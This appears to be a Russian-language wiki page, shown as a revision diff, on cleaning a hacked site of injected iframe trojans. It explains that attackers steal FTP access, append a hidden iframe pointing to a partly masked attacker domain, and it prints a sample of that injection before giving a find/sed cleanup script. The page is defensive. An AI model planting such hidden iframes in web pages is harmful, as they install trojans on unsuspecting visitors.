Clearing pages from iframe trojans — различия между версиями
(Новая: Существует такое понятие как ботнет. Ботнет это зараженные управляемые злоумышленником для совершен...) |
Admin (обсуждение | вклад) |
||
| (не показаны 4 промежуточные версии 2 участников) | |||
| Строка 1: | Строка 1: | ||
| − | Существует такое понятие как ботнет. Ботнет это зараженные управляемые злоумышленником для совершения различного рода вредоносных действий, таких как распределенные DDoS атаки, подбор паролей или рассылка спама. | + | === Очистка сайта от вирусов iframe === |
| + | |||
| + | Существует такое понятие как '''ботнет'''. '''Ботнет''' это зараженные управляемые злоумышленником для совершения различного рода вредоносных действий, таких как распределенные DDoS атаки, подбор паролей или рассылка спама. | ||
Набираются эти ботнеты как правило благодаря распространению троянов устанавливающих модули ботнета по машинам простых пользователей. | Набираются эти ботнеты как правило благодаря распространению троянов устанавливающих модули ботнета по машинам простых пользователей. | ||
| − | Одним из популярных способов является вставка в страницы взломаных сайтов определнного iframe который выполняет на компьютере жертвы код загружающий и устанавливающий трояна. | + | Одним из популярных способов является вставка в страницы взломаных сайтов определнного '''iframe''' который выполняет на компьютере жертвы код загружающий и устанавливающий трояна. |
Заражают страницы обычно взломав (подбор пароля или воровство пароля трояном)ftp доступ к сайту, и добавляя в конце станицы вредоносный код, примерно такого типа (домен заменен ***): | Заражают страницы обычно взломав (подбор пароля или воровство пароля трояном)ftp доступ к сайту, и добавляя в конце станицы вредоносный код, примерно такого типа (домен заменен ***): | ||
| − | < | + | <pre> |
| − | <div style="visibility:hidden"><iframe src="http://direct****. | + | <div style="visibility:hidden"><iframe src="http://direct****.*n/in.cgi?27" width=100 height=80></iframe></div> |
| − | </ | + | </pre> |
| + | |||
| + | Убрать вставки, особенно если сайт состоит из сотен или тысяч страниц, довольно проблематично, если делать это вручную. | ||
| + | |||
| + | Но есть способ сделать это быстро и безболезненно, на помощь нам придет [[ssh]]. Итак скрипт ниже: | ||
| + | <pre> | ||
| + | find ./ -type f -name \*.htm -exec sed -i 's/^.*directlinke.*$//g' {} \; | ||
| + | find ./ -type f -name \*.html -exec sed -i 's/^.*directlinke.*$//g' {} \; | ||
| + | find ./ -type f -name \*.php -exec sed -i 's/^.*directlinke.*$//g' {} \; | ||
| + | </pre> | ||
| + | |||
| + | Что же делает этот простенький bash скрипт? Он находит в текущей папке все файлы с расширением *.htm *.php *.html | ||
| + | затем ищет в них строку из вредоносной вставки (в нашем случае это кусок домена злоумышленника directlinke) и удаляет всю строку. | ||
| + | |||
| + | Результат достигнут, сайт очищен от вирусов. Теперь нужно позаботиться о том чтобы ситуация не повторялась, смените пароли от ftp доступа и обязательно проверьте компьютеры с которых осуществляется доступ к ftp на предмет вирусов. | ||
Текущая версия на 00:36, 7 декабря 2015
Очистка сайта от вирусов iframe
Существует такое понятие как ботнет. Ботнет это зараженные управляемые злоумышленником для совершения различного рода вредоносных действий, таких как распределенные DDoS атаки, подбор паролей или рассылка спама.
Набираются эти ботнеты как правило благодаря распространению троянов устанавливающих модули ботнета по машинам простых пользователей. Одним из популярных способов является вставка в страницы взломаных сайтов определнного iframe который выполняет на компьютере жертвы код загружающий и устанавливающий трояна.
Заражают страницы обычно взломав (подбор пароля или воровство пароля трояном)ftp доступ к сайту, и добавляя в конце станицы вредоносный код, примерно такого типа (домен заменен ***):
<div style="visibility:hidden"><iframe src="http://direct****.*n/in.cgi?27" width=100 height=80></iframe></div>
Убрать вставки, особенно если сайт состоит из сотен или тысяч страниц, довольно проблематично, если делать это вручную.
Но есть способ сделать это быстро и безболезненно, на помощь нам придет ssh. Итак скрипт ниже:
find ./ -type f -name \*.htm -exec sed -i 's/^.*directlinke.*$//g' {} \;
find ./ -type f -name \*.html -exec sed -i 's/^.*directlinke.*$//g' {} \;
find ./ -type f -name \*.php -exec sed -i 's/^.*directlinke.*$//g' {} \;
Что же делает этот простенький bash скрипт? Он находит в текущей папке все файлы с расширением *.htm *.php *.html затем ищет в них строку из вредоносной вставки (в нашем случае это кусок домена злоумышленника directlinke) и удаляет всю строку.
Результат достигнут, сайт очищен от вирусов. Теперь нужно позаботиться о том чтобы ситуация не повторялась, смените пароли от ftp доступа и обязательно проверьте компьютеры с которых осуществляется доступ к ftp на предмет вирусов.
